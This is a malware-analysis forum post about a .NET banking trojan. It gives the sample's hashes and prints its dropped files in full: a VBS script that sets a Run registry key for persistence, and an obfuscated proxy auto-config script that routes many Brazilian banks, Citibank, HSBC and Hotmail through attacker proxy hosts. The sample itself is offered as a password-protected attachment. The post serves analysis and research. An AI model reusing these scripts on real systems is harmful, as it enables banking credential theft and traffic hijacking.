MSIL/Banker

#18684 by r3shl4k1sh
Sun Mar 24, 2013 11:19 pm

I found this file few days ago, it is Banker according to VT https://www.virustotal.com/en/file/359b ... /analysis/

MD5: 4f68fc8ae042080a071a373dc54ef8b6
SH1: 359bdb0af9f84262cad461be389219ae062a3d699af51900cb3701086cde8620

This file is written using .NET (i assume), and after first run it copies itself to the user's Application Data directory.
In addition it drops the following 3 files in the user's Temp folder:

cc.vbs

Code: Select all

on error resume next
test = "winmgmts:{impersonationLevel=impersonate}//./root/default:StdRegProv"
Set objRegistry=GetObject(test)
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strValueName = "ytf3shx9ppa"
strValue = """C:\Documents and Settings\Administrator\Application Data\VZ4qng1\KqHWnRl.exe"""
objRegistry.SetStringValue &H80000001,strKeyPath,strValueName,strValue

tfile.jsp

Code: Select all

function FindProxyForURL(url, host)
{
//IPS
var iphot = "PROXY hota.tudoecology.com";
var nbebe = "PROXY noturno.tudoecology.com";
var ipd = "PROXY noturno.tudoecology.com";
var bosta = "PROXY noturno.tudoecology.com";
var ipsanta = "PROXY noturno.tudoecology.com";
var ipciti = "PROXY noturno.tudoecology.com";
var ipita = "PROXY noturno.tudoecology.com";
var iphsbc = "PROXY noturno.tudoecology.com";
var ipbanese = "PROXY noturno.tudoecology.com";
var ipserasa = "PROXY noturno.tudoecology.com";
var ipsicredi = "PROXY noturno.tudoecology.com";
var ipintouch = "PROXY noturno.tudoecology.com";
var ipbnb = "PROXY noturno.tudoecology.com";
var ipbrb = "PROXY noturno.tudoecology.com";
//Banco do Brasil
var pos1 = "*\x62"+""+"\x62*";
var tuvoa2 = "*\x62\x61\x6e\x63\x6f\x64\x6f\x62\x72\x61\x73\x69\x6c*";
if (shExpMatch(host, pos1)) {
return nbebe;
}
if (shExpMatch(host, tuvoa2)) {
return nbebe;
}
// Banese
var ban1 = "*\x62\x61\x6e\x65\x73\x65*";
if (shExpMatch(host, ban1)) {
return ipbanese;
}
// Caixa Economica Federal
var cef1 = "*cef*";
var cef2 = "*caixa*";
if (shExpMatch(host, cef1)) {
return bosta;
}
if (shExpMatch(host, cef2)) {
return bosta;
}
//HSBC
var hsbc1 = "*hsbc*";
if (shExpMatch(host, hsbc1)) {
return iphsbc;
}
//Sicredi
var sic1 = "*sicredi*";
if (shExpMatch(host, sic1)) {
return ipsicredi;
}
//BNB
var bnb1 = "*bnb*";
if (shExpMatch(host, bnb1)) {
return ipbnb;
}
//Citibank
var muki1 = "*citibank*";
if (shExpMatch(host, muki1)) {
return ipciti;
}
//Intouch
var int1 = "*intouch*";
if (shExpMatch(host, int1)) {
return ipintouch;
}
//Serasa
var ostra1 = "*serasa*";
if (shExpMatch(host, ostra1)) {
return ipserasa;
}
//SecureSSL
var foca1 = "*\x62\x72\x61\x64\x65\x73\x63\x6f*";
var ita1 = "*\x69\x74\x61\x75*";
var ssl1 = "*securessl*";
if (shExpMatch(host, ssl1)) {
return google.com.br;
}
//Bradesco
if (shExpMatch(host, foca1)) {
return ipd;
}
//Itau
if (shExpMatch(host, ita1)) {
return ipita;
}
//HOTMAIL
var hot1 = "*hotmail*";
if (shExpMatch(host, hot1)) {
return iphot;
}
//SANTA
var santa1 = "*santa";
var santa2 = "nder*";
var santa3 = santa1 + santa2;
var santa4 = "*real*";
if (shExpMatch(host, santa3)) {
return ipsanta;
}
if (shExpMatch(host, santa4)) {
return ipsanta;
}
return "DIRECT";
}

systemfile.txt

Code: Select all

foi

As you can see in the vbs file it writes in the registry to be auto run.

I am trying to see this file in action, or at least make network activity but i am unable to do so.
Someone can give short explanation on what is the purpose of the jsp file? is this file injected in every page retrieved by the browser?

Edit: Attach file

Attachments

NetBanker.rar

password: infected
(33.47 KiB) Downloaded 48 times

Last edited by EP_X0FF on Tue Mar 26, 2013 9:16 am, edited 1 time in total. Reason: renamed to be more descriptive

Username

r3shl4k1sh

Posts

119

Joined

Tue Feb 05, 2013 10:26 pm

Location

Israel

Contact

MSIL/Banker

MSIL/Banker

Attachments

Re: unknown Banker